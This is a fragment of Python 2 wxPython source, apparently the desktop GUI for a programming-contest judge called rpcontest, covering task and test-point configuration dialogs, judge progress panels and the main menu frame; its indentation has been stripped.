bsizer.Add(item,1,wx.EXPAND)
return bsizer
def PError(parent,txt):
error_dialog = wx.MessageDialog(
parent = parent,
caption = "Error",
message = txt,
style=wx.ICON_ERROR | wx.OK
)
error_dialog.ShowModal()
class rpcontest_EVT_ADD_RUNTIME_INFO(wx.PyCommandEvent):
def __init__(self,evtType,id):
wx.PyCommandEvent.__init__(self,evtType,id)
def GetText(self):
return self.txt
def SetText(self,txt):
self.txt = txt
class rpcontest_EVT_UPDATE_DISPLAY(wx.PyCommandEvent):
def __init__(self,evtType,id):
wx.PyCommandEvent.__init__(self,evtType,id)
def Set(self,UpdateType,con):
self.UpdateType = UpdateType
self.con = con
def Get(self):
return self.UpdateType,self.con
rpEVT_ADD_RUNTIME_INFO = wx.NewEventType()
EVT_ADD_RUNTIME_INFO = wx.PyEventBinder(rpEVT_ADD_RUNTIME_INFO,1)
rpEVT_UPDATE_DISPLAY = wx.NewEventType()
EVT_UPDATE_DISPLAY = wx.PyEventBinder(rpEVT_UPDATE_DISPLAY,1)
def EmitAppendRuntimeInfo(self,text):
evt = rpcontest_EVT_ADD_RUNTIME_INFO(rpEVT_ADD_RUNTIME_INFO,self.GetId())
evt.SetText(text)
self.GetEventHandler().ProcessEvent(evt)
def EmitUpdateDisplay(self,t,con):
evt = rpcontest_EVT_UPDATE_DISPLAY(rpEVT_UPDATE_DISPLAY,self.GetId())
evt.Set(t,con)
self.GetEventHandler().ProcessEvent(evt)
class rpcontest_CheckList(wx.Panel):
def __init__(self,parent,size=(150,100),OnCheckListBox = None,OnChooseAll = None,OnDechooseAll = None):
wx.Panel.__init__(self,parent)
self.sizer = wx.BoxSizer(wx.VERTICAL)
self.SelectedIndex = []
self.ListBox = wx.CheckListBox(self,-1,size=size)
self.sizer.Add(self.ListBox,1,wx.EXPAND)
hsizer = wx.BoxSizer()
self.ChooseAllButton = wx.Button(self,-1,"Select All")
hsizer.Add(self.ChooseAllButton,0,wx.ALIGN_RIGHT)
self.DechooseAllButton = wx.Button(self,-1,"Deselect All")
hsizer.Add(self.DechooseAllButton,0,wx.ALIGN_RIGHT)
self.sizer.Add(hsizer,0,wx.EXPAND)
self.SetSizer(self.sizer)
if not OnChooseAll: OnChooseAll = self.OnChooseAll
if not OnDechooseAll: OnDechooseAll = self.OnDechooseAll
if not OnCheckListBox: OnCheckListBox = self.OnCheckListBox
self.Bind(wx.EVT_BUTTON,OnChooseAll,self.ChooseAllButton)
self.Bind(wx.EVT_BUTTON,OnDechooseAll,self.DechooseAllButton)
self.Bind(wx.EVT_CHECKLISTBOX,OnCheckListBox,self.ListBox)
def ClearAll(self):
self.ListBox.Clear()
self.SelectedIndex = []
def Append(self,label):
self.ListBox.Append(label)
def GetCheckedItems(self):
return copy.deepcopy(self.SelectedIndex)
def OnChooseAll(self,event):
self.SelectedIndex = range(0,self.ListBox.GetCount())
for i in self.SelectedIndex:
self.ListBox.Check(i)
event.Skip()
def OnDechooseAll(self,event):
for i in range(0,self.ListBox.GetCount()):
self.ListBox.Check(i,False)
self.SelectedIndex = []
event.Skip()
def OnCheckListBox(self,event):
index = event.GetSelection()
if self.ListBox.IsChecked(index):
self.SelectedIndex.append(index)
else:
self.SelectedIndex.remove(index)
event.Skip()
class rpcontest_Gauge(wx.Panel):
def __init__(self,parent):
self.Width = 20
wx.Panel.__init__(self,parent,-1)
self.sizer = wx.BoxSizer()
self.Gauge = wx.Gauge(self,-1,1000)
self.sizer.Add(self.Gauge,1,wx.EXPAND)
self.Processer = wx.StaticText(self,-1,style=wx.ALIGN_LEFT,label= " [0.000 %]".center(self.Width))
self.sizer.Add(self.Processer,0,wx.EXPAND)
self.SetSizer(self.sizer)
def SetTotal(self,tot):
self.Total = tot
self.Current = 0
def SetCurrent(self,cur):
self.Current = cur
self.Processer.SetLabel((" [%.3f %%]" % (float(self.Current) / float(self.Total) * 100.0)).center(self.Width))
self.Gauge.SetValue(float(self.Current) / float(self.Total) * 1000)
def Reset(self):
self.Processer.SetLabel(" [0.000%]".center(self.Width))
self.SetTotal(1)
self.SetCurrent(0)
class EditSpotInfoDialog(wx.Dialog):
def __init__(self,parent,tk,spot = None,flag_UnableEditIndex = False,IndexList = None):
wx.Dialog.__init__(self,parent,
id=-1,
size=(400,500),
title="Edit Spot details",
style=wx.CAPTION
)
self.IndexList = IndexList
self.flag_UnableEditIndex = flag_UnableEditIndex
self.tk = tk
if spot:
self.spot = spot
else:
self.spot = rpc.TestPoint()
self.Centre()
self.sizer = wx.BoxSizer(wx.VERTICAL)
self.sizer.AddStretchSpacer(1)
self.sizer.Add(self.CreateWorkSpace(),0,wx.EXPAND)
self.sizer.AddStretchSpacer(1)
self.sizer.Add(self.CreateButtonBar(),0,wx.EXPAND)
self.SetSizer(self.sizer)
self.Bind(wx.EVT_BUTTON,self.OnOK,self.OKButton)
self.Bind(wx.EVT_BUTTON,self.OnCancel,self.CancelButton)
self.Bind(wx.EVT_BUTTON,self.OnChoose,self.ChooseButton)
self.Bind(wx.EVT_CHOICE,self.OnChoice,self.CmpModeCtrl)
def CreateWorkSpace(self):
def CreateLabel(label,pos):
return wx.StaticText(self.ConfigPanel,-1,label,pos=pos,size=(100,25))
def CreateTextCtrl(pos,txt):
return wx.TextCtrl(self.ConfigPanel,-1,pos=pos,size=(150,25),value=txt)
self.ConfigPanel = wx.Panel(self,-1,size=(300,400))
label = CreateLabel("Index",(50,20))
self.IndexCtrl = CreateTextCtrl((200,20),self.spot.FormatIndex())
if self.flag_UnableEditIndex:
self.IndexCtrl.SetEditable(False)
self.IndexCtrl.SetBackgroundColour("Grey")
CreateLabel("Timelim(s)",(50,50))
self.TimeCtrl = CreateTextCtrl((200,50),self.spot.FormatTimeLimit())
CreateLabel("Memlim(kb)",(50,80))
self.MemCtrl = CreateTextCtrl((200,80),self.spot.FormatMemLimit())
CreateLabel("Input",(50,110))
self.InputCtrl = CreateTextCtrl((200,110),self.spot.GetInput())
CreateLabel("Output",(50,140))
self.OutputCtrl= CreateTextCtrl((200,140),self.spot.GetOutput())
CreateLabel("Score",(50,170))
self.ScoreCtrl = CreateTextCtrl((200,170),self.spot.FormatScore())
CreateLabel("CmpMode",(50,200))
CreateLabel("Checker Path:",(50,230))
self.CmpModeCtrl = wx.Choice(self.ConfigPanel,-1,pos=(150,200),size=(200,25),
choices=["Ignore Extra Spaces","Compare Every Character","User Define"]
)
self.ChooseButton = wx.Button(self.ConfigPanel,-1,pos=(270,230),size=(80,25),label="Choose")
self.UserDefinePath = wx.TextCtrl(self.ConfigPanel,-1,
size=(300,100),pos=(50,260),
style=wx.TE_READONLY | wx.TE_MULTILINE
)
self.SetCmpModeState()
bsizer = wx.StaticBoxSizer(
wx.StaticBox(self,-1,label="Details"),
wx.VERTICAL
)
bsizer.Add(self.ConfigPanel,0,wx.EXPAND)
return bsizer
def SetCmpModeState(self):
index = 0
if self.spot.GetCmpMode()[0] == rpc.CMPMODE_IGNORE:
index = 0
elif self.spot.GetCmpMode()[0] == rpc.CMPMODE_TOTAL:
index = 1
elif self.spot.GetCmpMode()[0] == rpc.CMPMODE_USERDEF:
index = 2
self.CmpModeCtrl.SetSelection(index)
if index == 0 or index == 1:
self.ChooseButton.Disable()
self.UserDefinePath.Clear()
self.UserDefinePath.SetBackgroundColour("Grey")
else:
self.ChooseButton.Enable()
self.UserDefinePath.SetBackgroundColour("pink")
self.UserDefinePath.Clear()
self.UserDefinePath.AppendText(self.spot.GetCmpMode()[1])
def CreateButtonBar(self):
sizer = wx.BoxSizer()
sizer.AddStretchSpacer(1)
self.OKButton = wx.Button(self,-1,"OK")
sizer.Add(self.OKButton,0)
self.CancelButton = wx.Button(self,-1,"Cancel")
sizer.Add(self.CancelButton,0)
return sizer
def OnCancel(self,event):
self.spot = None
self.Destroy()
def OnOK(self,event):
data_path = self.GetParent().con.GetPath() + r'/' + rpc.PATH_D_DATA + r'/' + self.tk.GetTaskName()
spot = copy.deepcopy(self.spot)
try:
spot.SetIndex(self.IndexCtrl.GetValue())
spot.SetTimeLimit(self.TimeCtrl.GetValue())
spot.SetMemLimit(self.MemCtrl.GetValue())
spot.SetInput(self.InputCtrl.GetValue())
spot.SetOutput(self.OutputCtrl.GetValue())
spot.SetScore(self.ScoreCtrl.GetValue())
IndexList = self.IndexList if self.IndexList else [spot.GetIndex()]
for Index in IndexList:
spot.SetIndex(Index)
spot.Check(self.tk.GetDataPath(),self.tk.GetTaskName())
except rpc.RpException,x:
PError(self,x.FormatErrorText())
return
finally:
event.Skip()
self.spot = spot
self.Destroy()
def OnChoose(self,event):
ch = wx.FileDialog(self,
wildcard="*.*",
defaultDir = self.GetParent().con.GetPath(),
message = "Choose a Checker",
style= wx.FD_OPEN | wx.FD_FILE_MUST_EXIST
)
if ch.ShowModal() == wx.ID_OK:
self.spot.SetCmpMode(rpc.CMPMODE_USERDEF,ch.GetPath())
self.SetCmpModeState()
event.Skip()
def OnChoice(self,event):
index = self.CmpModeCtrl.GetCurrentSelection()
if index == 0: self.spot.SetCmpMode(rpc.CMPMODE_IGNORE)
elif index == 1: self.spot.SetCmpMode(rpc.CMPMODE_TOTAL)
elif index == 2: self.spot.SetCmpMode(rpc.CMPMODE_USERDEF,"")
self.SetCmpModeState()
def ShowDialog(self):
self.ShowModal()
return self.spot
class rpcontest_ConfigurePanel(wx.Panel):
def __init__(self,parent,con):
wx.Panel.__init__(self,parent)
self.sizer = wx.BoxSizer()
self.con = con
self.sizer.Add(self.CreateTaskBar(),0,flag=wx.EXPAND)
self.sizer.Add(self.CreateCompetitorBar(),0,flag=wx.EXPAND)
self.sizer.Add(self.CreateTaskInfoBar(),1,flag=wx.EXPAND)
self.SetSizer(self.sizer)
self.Bind(wx.EVT_LISTBOX,self.OnSelectTask,self.TaskListBox)
self.Bind(wx.EVT_CHECKLISTBOX,self.OnCheckListBox,self.TaskListBox)
self.Bind(wx.EVT_BUTTON,self.OnAddSpot,self.AddSpotButton)
self.Bind(wx.EVT_BUTTON,self.OnEditSpot,self.EditSpotButton)
self.Bind(wx.EVT_BUTTON,self.OnRemoveSpot,self.RemoveSpotButton)
self.Bind(wx.EVT_BUTTON,self.OnAddOtherSpot,self.AddOtherSpotButton)
self.Bind(wx.EVT_LIST_ITEM_SELECTED,self.OnSelectPoint,self.PointList)
self.Bind(wx.EVT_LIST_ITEM_DESELECTED,self.OnDeselectPoint,self.PointList)
self.Bind(wx.EVT_TEXT_ENTER,self.OnChangeTitleBar,self.TitleBar)
self.Bind(wx.EVT_TEXT_ENTER,self.OnChangeSrcFile,self.SrcBar)
self.Bind(wx.EVT_TEXT_ENTER,self.OnChangeSrcInput,self.SrcInputBar)
self.Bind(wx.EVT_TEXT_ENTER,self.OnChangeSrcOutput,self.SrcOutputBar)
self.Bind(wx.EVT_CHECKLISTBOX,self.OnCheckCompetitor,self.CompetitorListBox)
def CreateTaskBar(self):
tsizer = wx.BoxSizer(wx.VERTICAL)
self.TitleBar = wx.TextCtrl(self,-1,size=(150,20),style=wx.TE_PROCESS_ENTER)
tsizer.Add(CreateLabelItem(self,"Title",self.TitleBar),
0,flag=wx.ALIGN_LEFT | wx.TOP)
self.TaskListBox = wx.CheckListBox(
parent=self,
id=-1,
name="Tasks",
style = wx.LB_SINGLE | wx.LB_ALWAYS_SB
)
tsizer.Add(CreateLabelItem(self,"Tasks",self.TaskListBox),
1,wx.EXPAND)
return tsizer
def CreateCompetitorBar(self):
self.CompetitorListBox = wx.CheckListBox(self,-1,size=(150,20))
return CreateLabelItem(self,"Competitors",self.CompetitorListBox)
def CreateTaskInfoBar(self):
sizer = wx.BoxSizer(wx.VERTICAL)
hsizer = wx.BoxSizer()
self.TaskTitleBar = wx.TextCtrl(self,-1,size=(150,20),style=wx.TE_READONLY)
hsizer.Add(CreateLabelItem(self,"TaskTitle",self.TaskTitleBar),
0,wx.EXPAND)
self.SrcBar = wx.TextCtrl(self,-1,size=(150,20),style=wx.TE_PROCESS_ENTER)
hsizer.Add(CreateLabelItem(self,"SrcFile",self.SrcBar),
0,wx.EXPAND)
self.SrcInputBar = wx.TextCtrl(self,-1,size=(150,20),style=wx.TE_PROCESS_ENTER)
hsizer.Add(CreateLabelItem(self,"SrcInput",self.SrcInputBar),
0,wx.EXPAND)
self.SrcOutputBar = wx.TextCtrl(self,-1,size=(150,20),style=wx.TE_PROCESS_ENTER)
hsizer.Add(CreateLabelItem(self,"SrcOutput",self.SrcOutputBar),
0,wx.EXPAND)
sizer.Add(hsizer,0,wx.ALIGN_LEFT)
sizer.Add(self.CreateSpotDetailsBar(),1,wx.EXPAND)
return sizer
def CreateSpotDetailsBar(self):
self.Columns = (
("#",20),
("Index",50),
("Timelim(s)",-1),
("MemLim(kB)",-1),
("Input",-1),
("Output",-1),
("Score",-1),
("cmpmode",-1),
)
sizer = wx.BoxSizer(wx.VERTICAL)
self.PointList = wx.ListCtrl(self,-1,style=wx.LC_REPORT)
self.SelectedIndex = []
index = 0
for item,width in self.Columns:
self.PointList.InsertColumn(index,item,width=width)
index += 1
sizer.Add(CreateLabelItem(self,"Spots Details",self.PointList)
,1,wx.EXPAND)
hsizer = wx.BoxSizer()
self.AddSpotButton = wx.Button(self,-1,"Add Spot")
hsizer.Add(self.AddSpotButton,0,wx.EXPAND)
self.EditSpotButton = wx.Button(self,-1,"Edit Spot(s)")
hsizer.Add(self.EditSpotButton,0,wx.EXPAND)
self.AddOtherSpotButton = wx.Button(self,-1,"Add Other Spot(s)")
hsizer.Add(self.AddOtherSpotButton,0,wx.EXPAND)
self.AddOtherSpotButton.Disable()
self.RemoveSpotButton = wx.Button(self,-1,"Remove Spot(s)")
hsizer.Add(self.RemoveSpotButton,0,wx.EXPAND)
sizer.Add(hsizer,0,wx.EXPAND)
return sizer
def ClearSpotDetails(self):
self.PointList.DeleteAllItems()
self.SelectedIndex = []
self.TaskTitleBar.Clear()
self.SrcBar.Clear()
self.SrcInputBar.Clear()
self.SrcOutputBar.Clear()
self.AddOtherSpotButton.Disable()
def DisplaySpotDetails(self,tk_id):
self.ClearSpotDetails()
tk = self.con.GetTaskList()[tk_id]
self.TaskTitleBar.WriteText(tk.GetTaskName())
self.SrcBar.WriteText(tk.GetSrc())
self.SrcInputBar.WriteText(tk.GetSrcIn())
self.SrcOutputBar.WriteText(tk.GetSrcOut())
i = 0
for spot in tk.GetPointList():
index = self.PointList.InsertStringItem(sys.maxint,str(i))
self.PointList.SetStringItem(index,1,spot.FormatIndex())
self.PointList.SetStringItem(index,2,spot.FormatTimeLimit())
self.PointList.SetStringItem(index,3,spot.FormatMemLimit())
self.PointList.SetStringItem(index,4,spot.FormatInput(tk.GetTaskName()))
self.PointList.SetStringItem(index,5,spot.FormatOutput(tk.GetTaskName()))
self.PointList.SetStringItem(index,6,spot.FormatScore())
self.PointList.SetStringItem(index,7,spot.FormatCmpMode()[0])
i += 1
if self.PointList.GetItemCount() == 0:
self.AddOtherSpotButton.Disable()
else:
self.AddOtherSpotButton.Enable()
def UpdateDisplay(self,con = None):
self.PointList.DeleteAllItems()
self.TaskTitleBar.Clear()
self.SrcBar.Clear()
self.SrcInputBar.Clear()
self.SrcOutputBar.Clear()
self.TitleBar.Clear()
self.TaskListBox.Clear()
self.CompetitorListBox.Clear()
self.con = con
if not self.con: return
self.TitleBar.WriteText(self.con.GetTitle())
for ft in os.listdir(self.con.GetPath()):
if ft.split(".")[-1] == rpc.EXT_TYPE_RTC:
self.TaskListBox.Append(ft[:-len(rpc.EXT_TYPE_RTC) - 1])
tasklist = self.TaskListBox.GetStrings()
for tk in self.con.GetTaskList():
if tk.GetTaskName() in tasklist:
self.TaskListBox.Check(tasklist.index(tk.GetTaskName()))
for ft in os.listdir(self.con.GetPath() + r'/' + rpc.PATH_D_SRC):
if os.path.isdir(self.con.GetPath() + r'/' + rpc.PATH_D_SRC + r'/' + ft):
self.CompetitorListBox.Append(ft)
cplist = self.CompetitorListBox.GetStrings()
for cp in self.con.GetCompetitorList():
if cp.GetName() in cplist:
self.CompetitorListBox.Check(cplist.index(cp.GetName()))
def GetSelectedTask(self):
sel = self.TaskListBox.GetStringSelection()
if not sel:
return None,-1
index = self.con.IndexTask(sel)
if index == -1:
return sel,-1
return sel,index
def OnSelectTask(self,event):
sel,index = self.GetSelectedTask()
EmitAppendRuntimeInfo(self,"Current Task : %s\n" % sel)
if not sel or index ==-1: return
self.DisplaySpotDetails(index)
def OnCheckListBox(self,event):
index = event.GetSelection()
tk_name = self.TaskListBox.GetString(index)
if self.TaskListBox.IsChecked(index):
try:
self.con.AddTask(str(tk_name))
self.TaskListBox.SetSelection(index)
self.DisplaySpotDetails(self.con.IndexTask(self.TaskListBox.GetSelection()))
except rpc.RpException,x:
PError(self,x.FormatErrorText())
return
else:
self.con.RemoveTask(tk_name)
self.ClearSpotDetails()
EmitUpdateDisplay(self,"Judge",self.con)
def OnAddSpot(self,event):
EmitAppendRuntimeInfo(self,"Add A Spot\n")
try:
sel,index = self.GetSelectedTask()
if not sel or index == -1: return
dia = EditSpotInfoDialog(self,self.con.GetTaskList()[index])
spot = dia.ShowDialog()
if spot:
self.con.GetTaskList()[index].AddPoint(spot)
self.DisplaySpotDetails(index)
finally:
event.Skip()
def OnSelectPoint(self,event):
self.SelectedIndex.append(event.m_itemIndex)
event.Skip()
def OnDeselectPoint(self,event):
self.SelectedIndex.remove(event.m_itemIndex)
event.Skip()
def OnEditSpot(self,event):
try:
if len(self.SelectedIndex) == 0:
EmitAppendRuntimeInfo(self,"<WARN>No spot to edit!\n")
return
EmitAppendRuntimeInfo(self,"Edit Spot(s) #%s\n" % sorted(self.SelectedIndex))
sel,index = self.GetSelectedTask()
if not sel or index == -1: return
spot = rpc.TestPoint()
dia = EditSpotInfoDialog(self,self.con.GetTaskList()[index],
spot = spot,flag_UnableEditIndex = True,
IndexList=self.SelectedIndex
)
spot = dia.ShowDialog()
if spot:
for pos in self.SelectedIndex:
idx = self.con.GetTaskList()[index].GetPointList()[pos].GetIndex()
spot.SetIndex(idx)
self.con.GetTaskList()[index].RemovePoint(idx)
self.con.GetTaskList()[index].AddPoint(spot)
self.DisplaySpotDetails(index)
finally:
event.Skip()
def OnRemoveSpot(self,event):
try:
if len(self.SelectedIndex) == 0:
EmitAppendRuntimeInfo(self,"<WARN>No spot to remove!\n")
return
EmitAppendRuntimeInfo(self,"Remove spot(s) #%s\n" % self.SelectedIndex)
sel,index = self.GetSelectedTask()
if not sel or index == -1: return
if wx.MessageDialog(self,
message = "Remove these spots?",
caption = "Caution",
style = wx.YES_NO | wx.ICON_EXCLAMATION | wx.NO_DEFAULT
).ShowModal() == wx.ID_NO:
return
for idx in self.SelectedIndex:
self.con.GetTaskList()[index].RemovePoint(idx)
self.DisplaySpotDetails(index)
finally:
event.Skip()
def OnAddOtherSpot(self,event):
EmitAppendRuntimeInfo(self,"Finding ...\n")
try:
sel,index = self.GetSelectedTask()
if not sel or index == -1: return
Task = self.con.GetTaskList()[index]
spot = copy.deepcopy(Task.GetPointList()[0])
for idx in range(0,1000):
spot.SetIndex(idx)
try:
spot.Check(Task.GetDataPath(),Task.GetTaskName())
except rpc.RpException:
continue
else:
EmitAppendRuntimeInfo(self," Found new spot @Index:%d\n" % idx)
Task.AddPoint(spot)
self.DisplaySpotDetails(index)
finally:
event.Skip()
def OnChangeTitleBar(self,event):
try:
if not self.con: return
EmitAppendRuntimeInfo(self,"New Contest Title : %s\n" % self.TitleBar.GetValue())
self.con.SetTitle(self.TitleBar.GetValue())
finally:
event.Skip()
def OnChangeSrcFile(self,event):
try:
sel,index = self.GetSelectedTask()
if not sel or index == -1: return
EmitAppendRuntimeInfo(self,"New Source File : %s\n" % self.SrcBar.GetValue())
self.con.GetTaskList()[index].SetSrc(self.SrcBar.GetValue())
finally:
event.Skip()
def OnChangeSrcInput(self,event):
try:
sel,index = self.GetSelectedTask()
if not sel or index == -1: return
EmitAppendRuntimeInfo(self,"New src input : %s\n" % self.SrcInputBar.GetValue())
self.con.GetTaskList()[index].SetSrcIn(self.SrcInputBar.GetValue())
finally:
event.Skip()
def OnChangeSrcOutput(self,event):
try:
sel,index = self.GetSelectedTask()
if not sel or index == -1: return
EmitAppendRuntimeInfo(self,"New src output : %s\n" % self.SrcOutputBar.GetValue())
self.con.GetTaskList()[index].SetSrcOut(self.SrcOutputBar.GetValue())
finally:
event.Skip()
def OnCheckCompetitor(self,event):
index = event.GetSelection()
cp_name = self.CompetitorListBox.GetString(index)
if self.CompetitorListBox.IsChecked(index):
self.con.AddCompetitor(cp_name)
else:
self.con.RemoveCompetitor(cp_name)
EmitUpdateDisplay(self,"Judge",self.con)
event.Skip()
class rpcontest_RunJudgePanel(wx.Panel):
def __init__(self,parent):
wx.Panel.__init__(self,parent,-1)
self.sizer = wx.BoxSizer(wx.VERTICAL)
self.ProcessGauge = rpcontest_Gauge(self)
self.sizer.Add(CreateLabelItem(self,"Process",self.ProcessGauge),0,wx.EXPAND)
self.TimerLED = wx.gizmos.LEDNumberCtrl(self,-1)
self.TimerLED.SetValue("0.000-0.000")
self.sizer.Add(CreateLabelItem(self,"Timer",self.TimerLED),1,wx.EXPAND)
self.Timer_Total = 0.0
self.Timer_Current = 0.0
self.ProcessTextCtrl = wx.TextCtrl(self,-1,style=wx.TE_READONLY | wx.TE_MULTILINE)
Font = wx.Font(10,wx.MODERN,wx.NORMAL,weight=10)
self.ProcessTextCtrl.SetFont(Font)
self.sizer.Add(self.ProcessTextCtrl,3,wx.EXPAND)
self.sizer.Add(self.CreateButton(),0,wx.EXPAND)
self.SetSizer(self.sizer)
self.flag_OmitJudged = False
self.flag_FastJudge = False
self.Bind(wx.EVT_BUTTON,self.OnStopJudge,self.StopJudgeButton)
self.Bind(wx.EVT_BUTTON,self.OnStartJudge,self.StartJudgeButton)
def CreateButton(self):
hsizer = wx.BoxSizer()
self.StartJudgeButton = wx.Button(self,-1,label="Start Judge")
hsizer.Add(self.StartJudgeButton,0,wx.RIGHT)
self.StopJudgeButton = wx.Button(self,-1,label="Stop Judge")
hsizer.Add(self.StopJudgeButton,0,wx.RIGHT)
self.StopJudgeButton.Disable()
return hsizer
def UpdateTimer(self,Current,Total):
def _UpdateTimer(self,Current,Total):
self.TimerLED.SetValue("%.3f-%.3f " % (Current,Total))
wx.CallAfter(_UpdateTimer,self,Current,Total)
def UpdateProcess(self,Current,Total):
def _UpdateProcess(self,Current,Total):
self.ProcessGauge.SetTotal(Total)
self.ProcessGauge.SetCurrent(Current)
wx.CallAfter(_UpdateProcess,self,Current,Total)
def EndJudge(self):
def _EndJudge(self):
self.ProcessGauge.SetCurrent(self.ProcessGauge.Total)
self.StartJudgeButton.Enable()
self.StopJudgeButton.Disable()
wx.CallAfter(_EndJudge,self)
def AddJudgeInfo(self,Text):
def _AddJudgeInfo(self,Text):
self.ProcessTextCtrl.AppendText(Text)
wx.CallAfter(_AddJudgeInfo,self,Text)
def OnStartJudge(self,event):
self.con = self.GetParent().con
competitors = self.GetParent().Competitors.GetCheckedItems()
tasks = self.GetParent().Tasks.GetCheckedItems()
if len(competitors) == 0 or len(tasks) == 0:
return
self.ProcessTextCtrl.Clear()
self.td = thread.start_new_thread(
self.con.Judge,
(tasks,competitors,self.flag_OmitJudged,self.flag_FastJudge)
)
self.StartJudgeButton.Disable()
self.StopJudgeButton.Enable()
event.Skip()
def OnStopJudge(self,event):
wx.CallAfter(self.con.AbortJudge)
self.StartJudgeButton.Enable()
self.StopJudgeButton.Disable()
self.ProcessGauge.Reset()
event.Skip()
class rpcontest_JudgePanel(wx.Panel):
def __init__(self,parent,con):
wx.Panel.__init__(self,parent,id = -1)
self.con = con
self.sizer = wx.BoxSizer()
self.sizer.Add(self.CreateJudgeInfoBox(),0,wx.EXPAND)
self.sizer.Add(self.CreateJudgeProcessBox(),1,wx.EXPAND)
self.SetSizer(self.sizer)
def CreateJudgeInfoBox(self):
sizer = wx.BoxSizer(wx.HORIZONTAL)
self.Competitors = rpcontest_CheckList(self)
sizer.Add(CreateLabelItem(self,"Choose Competitors:",self.Competitors),1,wx.EXPAND)
self.Tasks = rpcontest_CheckList(self)
sizer.Add(CreateLabelItem(self,"Choose Tasks:",self.Tasks),1,wx.EXPAND)
return CreateLabelItem(self,"Judgement Information",sizer)
def UpdateDisplay(self,con):
self.con = con
self.Competitors.ClearAll()
self.Tasks.ClearAll()
if not self.con: return
for tk in self.con.GetTaskList():
self.Tasks.Append(tk.GetTaskName())
for cp in self.con.GetCompetitorList():
self.Competitors.Append(cp.GetName())
def CreateJudgeProcessBox(self):
sizer = wx.BoxSizer(wx.VERTICAL)
self.JudgePanel = rpcontest_RunJudgePanel(self)
sizer.Add(self.JudgePanel,1,wx.EXPAND)
return CreateLabelItem(self,"Judgement Process",sizer)
def SetFlag_OmitJudged(self,Flag):
self.JudgePanel.flag_OmitJudged = Flag
def SetFlag_FastJudge(self,Flag):
self.JudgePanel.flag_FastJudge = Flag
class rpcontest_WorkPanel(wx.Panel):
def __init__(self,parent,frame):
self.TabWidth = 50
wx.Panel.__init__(self,parent,-1,style=wx.SUNKEN_BORDER)
self.Frame = frame
self.nb = wx.Notebook(self)
self.config_window = rpcontest_ConfigurePanel(self.nb,self.Frame.con)
self.nb.AddPage(self.config_window,"Config".center(self.TabWidth))
self.judge_window = rpcontest_JudgePanel(self.nb,self.Frame.con)
self.nb.AddPage(self.judge_window,"Judge".center(self.TabWidth))
self.sizer = wx.BoxSizer()
self.sizer.Add(self.nb,1,flag=wx.EXPAND)
self.SetSizer(self.sizer)
def UpdateDisplay(self,con):
self.config_window.UpdateDisplay(con)
self.judge_window.UpdateDisplay(con)
class rpcontest_Frame(wx.Frame):
def __init__(self):
self._Title = "%s %s" % (app_name,version)
wx.Frame.__init__(
self,
parent=None,
id=-1,
title=self._Title,
size=(1200,800)
)
self.Center()
self._icon = wx.Icon(rpc.IPTH + r"/icon.png",wx.BITMAP_TYPE_PNG)
self.SetIcon(self._icon)
self.con = None
self.CreateMenuBar()
self.CreateWorkSpace()
self.statusbar = self.CreateStatusBar()
self.SetStatus()
self.Bind(EVT_ADD_RUNTIME_INFO,self.OnAddRuntimeInfo)
self.Bind(EVT_UPDATE_DISPLAY,self.OnUpdateDisplay)
self.flag_MergeExport = False
self.flag_ForceExport = False
self.CreateOutputHandle()
def OnAddRuntimeInfo(self,event):
self.AddRuntimeInfo(event.GetText())
def OnUpdateDisplay(self,event):
t,con = event.Get()
if t == "All":
self.workwindow.UpdateDisplay(con)
elif t == "Config":
self.workwindow.config_window.UpdateDisplay(con)
elif t == "Judge":
self.workwindow.judge_window.UpdateDisplay(con)
def AddRuntimeInfo(self,info):
max_line_lenth = 512
self.infowindow.AppendText(info)
while self.infowindow.GetNumberOfLines() > max_line_lenth:
self.infowindow.Remove(0,1)
def CreateMenuBar(self):
MenuData = \
(
("&Contest",
("&Open Contest\tCtrl-O" ,"Open an existed contest",self.OnOpenContest),
("&New Contest\tCtrl-N" ,"Create a new contest",self.OnCreateContest),
("&Save Contest\tCtrl-S" ,"Save Current contest",self.OnSaveContest),
(None,None,None),
("&Quit\tCtrl-Q" ,"Quit rpcontest",self.OnQuit)
),
("C&ontrol",
("&Refresh\tF5" , "Refresh the display",self.OnRefresh),
("&Reload\tCtrl-F5" , "Reload the contest",self.OnReload)
),
("&Judge",
("Judge Options" , "Config Your Judgement",
(
("Don't wait after judgement","#CheckItem",self.OnCheckFastJudge),
("Omit judged competitors and tasks","#CheckItem",self.OnCheckOmitJudged)
)
),
("Export Options", "Config Your Export Style",
(
("Force Export","#CheckItem",self.OnCheckForceExport),
("Export as a html file","#CheckItem",self.OnCheckMergeExport),
)
),
("Clear Results" ,"Note : Will Auto Reload the Contest",self.OnClearResult),
("Export Html\tCtrl-E" , "Export As a HTML File",self.OnExportHtml),
("Open Report File\tCtrl-Alt-E", "Open Report File",self.OnOpenReport)
),
("&InfoWindow",
("On" , "#RadioItem" , self.TurnOnInfoWindow),
("Off", "#RadioItem" , self.TurnOffInfoWindow)
),
("&Help",
("&Help Document\tF1","Help Document",self.OnHelp),
("&About","About",self.OnAbout)
),
)
def CreateMenu(menudata):
menu = wx.Menu()
for label,status,handler in menudata:
if label == None:
menu.AppendSeparator()
else:
if type(handler) == tuple:
menu.AppendMenu(-1,label,CreateMenu(handler),status)
elif status[0] == '#':
if status == '#CheckItem':
cmenu = menu.AppendCheckItem(-1,label,status)
self.Bind(wx.EVT_MENU,handler,cmenu)
elif status == "#RadioItem":
cmenu = menu.AppendRadioItem(-1,label,status)
self.Bind(wx.EVT_MENU,handler,cmenu)
else:
cmenu = menu.Append(-1,label,status)
self.Bind(wx.EVT_MENU,handler,cmenu)
return menu
self.menubar = wx.MenuBar()
self.Menus = []
for md in MenuData:
ml,md = md[0],md[1:]
self.Menus.append(CreateMenu(md))
self.menubar.Append(self.Menus[-1],ml)
self.SetMenuBar(self.menubar)
def CreateWorkSpace(self):
def CreateWorkWindow():
self.workwindow = rpcontest_WorkPanel(self,self)
self.sizer.Add(self.workwindow,proportion=2,flag = wx.EXPAND)
def CreateInfoWindow():
self.infowindow = wx.TextCtrl(
parent = self,
id = -1,
style=wx.SUNKEN_BORDER | wx.TE_MULTILINE | wx.TE_READONLY
)
self.infowindow.SetBackgroundColour("pink")
Font = wx.Font(11,wx.MODERN,style=wx.NORMAL,weight=11)
self.infowindow.SetFont(Font)
self.__total_infowindow = CreateLabelItem(self,"Runtime Information:",self.infowindow)
self.sizer.Add(self.__total_infowindow,
proportion=1,flag = wx.EXPAND)
self.sizer = wx.BoxSizer(wx.VERTICAL)
CreateWorkWindow()
CreateInfoWindow()
self.SetSizer(self.sizer)
def SetStatus(self):
if self.con:
self.statusbar.SetStatusText("Contest : %s" % self.con.GetTitle())
